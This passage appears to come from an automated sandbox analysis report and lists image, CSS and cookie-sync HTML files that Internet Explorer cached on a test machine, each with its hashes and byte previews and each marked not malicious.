                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..FOAX\.vC...S..Y.........`.~v.;....m.9?Z..T5......1...t.....S)_....zU"l';....i.."..M.s...,7q.!i....i.{.M.K..\..p.Z..]d}....cax.T..K...9'9.;.Es...;...q.E...r"..x.=...Y8...;.$.\6..+..l..z.Q.!.g.....Y=.X.H.zQ.......B.....8..6.~.O(...S....1......0*..;.q.av.F.\.q......0..%{.....dqN..FzR.\.....&@...+.....R:e!.........#*;b..E!.X..".)\.J..).0..p).NBl..{SH\......0.:.....c;....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgpXv[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                Category:dropped
                                                Size (bytes):15626
                                                Entropy (8bit):7.962500897509523
                                                Encrypted:false
                                                SSDEEP:384:0JDz3LK/RAsFLqnDKf9aQI7LxXXylceAwl:0JDrLK/RAsF+nGf9aQOtXy7fl
                                                MD5:A52E535F3BC8BC8042A2DA850FA5EAF9
                                                SHA1:A921CB4EB83506A6E60D30F4DEB835DCA3EA6DEC
                                                SHA-256:AAE858FFA5F17507E49190460F62FF561C3EE8798A51464456F4B189DE6834BE
                                                SHA-512:06B934D9CF90F57875F4345F35DD7FF2B344F1C1DB531DA8747F271D185EFF6973B97DBAB20F3755B33E6BFE242198071DC179D0855946218FFDE4FF7CA4ED45
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........6...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...nA.<z.....VI?{.#.j.4...{.l.....]ID2..!...8.q.c.._p*p.[..P.)...D..v.:pi...m...+..6r.qZBVD.\.K.qj....G@y..+....g.C:.M.,A ...:...b..V.R..r.Y........ ..Q.-..R.K@O....N..3...m..W..S..Y|..P....nv....J..K.3...nn.....ih....r..z...2..`7.......no.y.......W....4G...O..0..,..NI.&....R.3.SD..LB6..#8..J...C....|..l..)8.1[..c-.0....R..C.I.w..>.....C.4y$..l...G.K.c.t..s..bH.RH.....!.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAOgzH6[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):17001
                                                Entropy (8bit):7.557235539199786
                                                Encrypted:false
                                                SSDEEP:384:IA8xSo7+zIo4rNZQQ4svcGancTZ0KIlBz0IjmOk+lduu/6xIL:IjEUogv4svcbcToN0+Xuuay
                                                MD5:EAECF54AA2CDC33FC2D7238560F601AE
                                                SHA1:1E25B64DA671A1DBEA98643F2357BD04761820D9
                                                SHA-256:B35091DD6B77688B9E49CDD17A2F196E864624B39D2EBB95B63DE927F69B07CD
                                                SHA-512:43C47B5BB9E8339EB207239C3338A6C1E259711F52CDB7852CD3CE657F0A4B2BC2D2583A2C07409208F5959AAE6A7439D00700AE9F8FB3C0C5B2F1FE2D561637
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?............P...."{7..F.4......X..c,>.o..b0=i...9.).i....x,..1..p.y..9.......#.f.Z.Ci.J.;....J.)..@.h.(.4.....P..@..c.h....&....@.ZD..CP3..{s..........>K.6..4...P.8.D.s....!..q..q..b.......`..1.ycx..Z`s...(...S.....@...AL...@.......@....P.P....)=..gUo4O. P..M..8..d.5.p#..][..#.@.M4m.U.9.Cc..q...5.R9X...W.'Im.84....P.t.J....l..........-.(.......`.s..?.;........NK....l..{g.J.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\AAud6Gv[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):356
                                                Entropy (8bit):7.101459310090333
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
                                                MD5:A94D5FFB98CBCA323E6AEA6A826B9ACF
                                                SHA1:D4F20C419292258A27A06511955A02400C767723
                                                SHA-256:7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
                                                SHA-512:D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx...j.A.....A..y..X....$.E.'.b.:.h!.bc%...:.FlD..L.@:...F...o...u..+.>nvf..v..n.;08..<.,C....-|A.x.D1.Mx....B.R>.......3..d@....%....v.Z...5.C....3@.a.[..iku.....%.(....p.h..m.](..s>F.&...q.^..dH......0<a1...4. .z.Q.@<W...,....4..?M.b......@{X..L..x...|:.B..B..K...j..k6/..LE@....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB14EN7h[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):13764
                                                Entropy (8bit):7.273450351118404
                                                Encrypted:false
                                                SSDEEP:384:IfOm4cIa37nstlEM15mv7OAkrIh4McOD07+8n0GoJdxFhEh8:I2m4pa37stlTgqAjS0GoJd3yK
                                                MD5:DA6531188AED539AF6EAA0F89912AACF
                                                SHA1:602244816EA22CBE39BBD4DB386519908745D45C
                                                SHA-256:C719BE5FFC45680FE2A18CDB129E60A48A27A6666231636378918B4344F149F7
                                                SHA-512:DF03FA1CB6ED0D1FFAC5FB5F2BB6523D373AC4A67CEE1AAF07E0DA61E3F19E7AF43673B6BEFE7192648AC2531EF64F6B4F93F941BF014ED2791FA6F46720C7DB
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......5.D..gJ.ks@..(...@.........l..pE..iT...t&..V.M..h....4.m.-.!....:...........*...a...CQ...c....Fj....F(...5 ..<.....J..E.0."..].6...B.K........k.t.A'p..KJ..*A....(......(......(......(......(......(......(......(......(.......K1......:...0......I...M.9..n..d.Z.e.Q..HfE....l^...h.h.t....(.9:.2....z...@.....:...3..w.@.P4Ac1.a.@...A#.P1... ..4..@.@.(.h.h.(....0....Y..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB14hq0P[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):19135
                                                Entropy (8bit):7.696449301996147
                                                Encrypted:false
                                                SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                                MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                                SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                                SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                                SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h.h........(.h........(.h......Z.(........(.h........TNY...W....q@..~..<..h.....dG.@.........F....L.@%}.....-K.F.9...c..O.7X9u,%.k.4..4..c.<p"...cp.-...U.J.n2..9.b.d.SphR.\V.5Q-./.LV.6...HM.V.d^E...F.q.*+7..a.m..VOA..qR.X.rx5&.(..Q..P.R..x..WM-.?........V..GTi.(.(........(........J.(.(......J.(........Z.(........Z.(........Z.(........(.h.......i..H.@...;..Y...q...0.<e+.B...[.v..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1aXBV1[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1161
                                                Entropy (8bit):7.80841974432226
                                                Encrypted:false
                                                SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1cG73h[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):1131
                                                Entropy (8bit):7.767634475904567
                                                Encrypted:false
                                                SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                MD5:D1495662336B0F1575134D32AF5D670A
                                                SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.....*..<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue...*.....?A...v..0...aS.*:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C|{.|r.$.=Y.#5.K6.!........d.G...{......$.-D*.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....|K..T....vd....cH.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB6Ma4a[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):368
                                                Entropy (8bit):6.811857078347448
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.*t..|....)....(.$.`..a...d.qd.....3...W_...}.*...;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBVuddh[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):316
                                                Entropy (8bit):6.917866057386609
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
                                                MD5:636BACD8AA35BA805314755511D4CE04
                                                SHA1:9BB424A02481910CE3EE30ABDA54304D90D51CA9
                                                SHA-256:157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
                                                SHA-512:7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..|......|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.|.Q...Q..i~.|...._...'..Q...".....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBXXVfm[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):842
                                                Entropy (8bit):7.712790381238881
                                                Encrypted:false
                                                SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx.e.Oh\U......2.....65...\...].,ZT...Z(...U.....t...P.P..P(.n.Vl.JA......%3...h.i&3y/.z........}.;.|.<.J.6.fcr:LZ-..+...(...Pp.......,y..=..D......V:...Q,....r...5.hI[.a..A.....93.K>.st.........Dq..&....2)..bl.Y.........._..4Ag..s.(l?A..>..m.M.W..O...C....f.......r.^;<...r...n.....9.......t..<.I.r|......|1?S.|......#0..O@.6=}.....q.^..NX.9*.Gh..Q.!i6...A.,..&.5+...o...dod...J......D'CS:....../...:......X|..zH....$#}5K..x^.-.-.X>@.'.W .+.~../..z.o_H.~IF.f.o.}[,.eh,=.....W-....Tf?..........t5$~b...Pgq..6..o}9v..'......KJ.I.|MT.....d..i..7..^.....i2....l..W.X..a.].V...UWf...fd....=.1~K....[.dX...dV..J.......eL....O.....R. .T._.wGr2...W.x. .W......I....4X....Y~.$.c...v\o_^...S......O.z..gV.T..............x...{..7..3i.@%.....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBZ3zrM[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):763
                                                Entropy (8bit):7.621723844116318
                                                Encrypted:false
                                                SSDEEP:12:6v/7N5fvaQCJmEzDuMi5ld08fuKGi9o4eUTE5xDgic9NEm652PPanadeh7jteQ8c:IBihmEGMi5ltfDPu4E5iic9NEp52kl9
                                                MD5:CFE739AEAE33DC7C7BB02D24E081F0CE
                                                SHA1:CBE000F23A34635EF4518C919A234DC4A3635C1E
                                                SHA-256:A1F6D07C79B387A99C2550B0E24AD030964EB42ACBA18F21F2D790A05499BAF3
                                                SHA-512:E8CD4F90716E62E4A0A8B9817794F55517CA52EC75F634E55462BBFDFB288076C1992298DB5578C84EC695D3B23BE6FF1AD80EDEEBA8435AAF96B6B32C711C5D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx.]SKO.Q...s;e:.}.}@.._....hb..b..kw........M\..t.0j....|"..E.2..C...S..M...s..;.~W..<.....=>......J.P..?.L........Pf.eB.BU...@.^"1(..05.]UA0....g..N.....H.K.L..P..z....;N..O.pi<...{oVpc*.[..D...@6.a,2....<..sq.h.h~.s.*..I.@L.....h8......)$.4.B.*.....3...m.&..H.....1...8.7...0...u..k.)d..\.;@...:m..*.Tc.....$.v..a..v.x.(;{..G...+...QY..L.N....;E......T..>@r(.;''d...0...../.nT.01...P!...5...P.....`...b.Q....k6.*..l....R.....P.Pw.t;..T.R...6[...\.l.7'Gpq$...[.Z.%....jb..`e..T.X...C.Y#.W..\.....B.B..mR...p.0.?.J..[.....K...Sl....."B.b.A...@.-..w.`E*.-.w..@<(,Ki.^O...zY^.. 7..4E.oyN..e..'.j.4...4ST .?.D.G....(...C..<.....8E...<?......../..X^c..j....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BBkwUr[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):436
                                                Entropy (8bit):7.255906495097201
                                                Encrypted:false
                                                SSDEEP:6:6v/lhPahm/BBjoPHhOVDqpp05cMxyHtGUmmozY7JE3R+hRMCzRPasXQc01UaVesl:6v/7MHQg25b8Ht3VEMNQ2w5
                                                MD5:01B5E74F991A886215461BF0057008C7
                                                SHA1:6A7347C3559814722D7AA4D491A0D754E157FCC5
                                                SHA-256:DB8A0C0A44AEE824F689A942D99802F95D7950758CB0739C7F179624A592CD51
                                                SHA-512:17820A7C90B35B0E45D0A07F5445D8C97BFD3098FD9E0F0283CD6CFC1DB2B33C651924D2F04EF398C147CEB8D7DEA3F591DBC19F9039279407C4E4231AC5F5B7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+.....fIDATx.}..M.@.......0...Aa.......#0..."..0....a....<....<....y..qS......m..k..%.'|.......`....Z.`x...X............Np..x........a%(..ab........=.....j.[....0}.>.O..R~..<@y....nV..:.q.....G.P.e..............?s....i^l.P..5.0....?...&.A.K..|+...X.h)....5K...Zx...[....G...0N<.~PC.@.X.O2..N..x...:?..7.xH.&.......C3..8....Q.*.>...W..~..].U..U>L/....Le&.......IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\NewErrorPageTemplate[2]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1612
                                                Entropy (8bit):4.869554560514657
                                                Encrypted:false
                                                SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                MD5:DFEABDE84792228093A5A270352395B6
                                                SHA1:E41258C9576721025926326F76063C2305586F76
                                                SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[3].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
                                                Encrypted:false
                                                SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\checksync[4].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):21628
                                                Entropy (8bit):5.304819777739522
